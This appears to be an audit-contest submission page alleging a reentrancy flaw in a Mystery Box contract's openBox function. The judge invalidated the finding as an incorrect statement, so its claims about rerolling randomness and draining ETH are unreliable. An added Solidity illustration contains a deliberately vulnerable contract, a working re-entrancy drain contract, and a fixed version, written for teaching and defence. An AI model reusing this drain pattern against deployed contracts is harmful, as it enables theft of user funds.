Mystery Box

First Flight #25
Beginner Friendly, Foundry
100 EXP
Submission Details
Severity: high
Invalid

Reentrancy Possibility in MysteryBox.sol:openBox function

Summary

After we determine the randomValue, there is the selection of the possibility of a winner based on percentages. If an attacker were to write an attack contract that stepped into the contract and re-entered it over and over, they could not only reroll the randomValue and break randomness but also, if they got the number they wanted, continuously drain the contract of ETH.

Vulnerability Details

An attacker using an attack contract could be able to re-enter and possibly reroll the randomValue, and could also focus solely on a high-earning reward, thus draining the victim contract of all ETH using the reentrancy attack vector.

Impact

The contract could have all of its ETH drained; the impact would be high.

Tools Used

Manual Review

Recommendations

Implement a Checks-Effects-Interactions style system within the MysteryBox.sol:openBox function. Moving the boxesOwned subtraction to before the determination of the reward would ensure that the user would not be able to re-enter endlessly.
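
As an added illustration, not code from the Mystery Box contract or from this submission, the hypothetical contracts below show what the reported attack actually requires: an external call to the caller (here an ETH transfer via `call`) placed before the `boxesOwned` update. If `openBox` makes no external call before its state change there is nothing to re-enter, which is the first thing to verify before filing this class of finding. The contract names, the flat `REWARD` payout in place of the percentage table, and the `Reenter` contract are assumptions made for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical box game written for this note (not the Mystery Box code).
// openBox() is re-enterable ONLY because it sends ETH to msg.sender before it
// updates boxesOwned; with no external call there would be nothing to re-enter.
contract VulnerableBoxGame {
    mapping(address => uint256) public boxesOwned;
    uint256 public constant BOX_PRICE = 0.1 ether;
    uint256 public constant REWARD = 0.05 ether; // assumed flat payout

    function buyBox() external payable {
        require(msg.value == BOX_PRICE, "Wrong price");
        boxesOwned[msg.sender] += 1;
    }

    // Interaction (ETH transfer) happens before the effect (decrement).
    function openBox() external {
        require(boxesOwned[msg.sender] > 0, "No boxes to open");
        (bool ok, ) = msg.sender.call{value: REWARD}("");
        require(ok, "Transfer failed");
        // unchecked so the example actually drains on 0.8: with checked
        // arithmetic the stacked decrements would underflow on unwind and
        // revert the whole attack transaction.
        unchecked { boxesOwned[msg.sender] -= 1; }
    }
}

// Attacker: receive() calls back into openBox() while the stale
// boxesOwned[this] == 1 check still passes, taking one REWARD per re-entry.
contract Reenter {
    VulnerableBoxGame public immutable game;

    constructor(VulnerableBoxGame _game) {
        game = _game;
    }

    function attack() external payable {
        game.buyBox{value: msg.value}();
        game.openBox();
    }

    receive() external payable {
        if (address(game).balance >= game.REWARD()) {
            game.openBox();
        }
    }
}

// Hardened version, checks-effects-interactions: the decrement precedes the
// transfer, so a re-entrant openBox() fails the require() and reverts.
contract SafeBoxGame {
    mapping(address => uint256) public boxesOwned;
    uint256 public constant BOX_PRICE = 0.1 ether;
    uint256 public constant REWARD = 0.05 ether;

    function buyBox() external payable {
        require(msg.value == BOX_PRICE, "Wrong price");
        boxesOwned[msg.sender] += 1;
    }

    function openBox() external {
        require(boxesOwned[msg.sender] > 0, "No boxes to open"); // check
        boxesOwned[msg.sender] -= 1;                            // effect
        (bool ok, ) = msg.sender.call{value: REWARD}("");       // interaction
        require(ok, "Transfer failed");
    }
}
```

With `VulnerableBoxGame` funded by other players, `Reenter.attack{value: 0.1 ether}()` collects one `REWARD` per nested call until the game's balance drops below `REWARD`. Against `SafeBoxGame` the nested `openBox()` hits the `require`, `receive()` reverts, the outer `call` returns `ok == false`, and the whole transaction is rolled back. Note also that re-entering does not change a value derived from block data and `msg.sender` within the same transaction, so a reentrancy finding needs to show the external call, not just the state-ordering.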

Updates

Lead Judging Commences

inallhonesty Lead Judge
9 months ago

Appeal created

inallhonesty Lead Judge 9 months ago
Submission Judgement Published
Invalidated
Reason: Incorrect statement
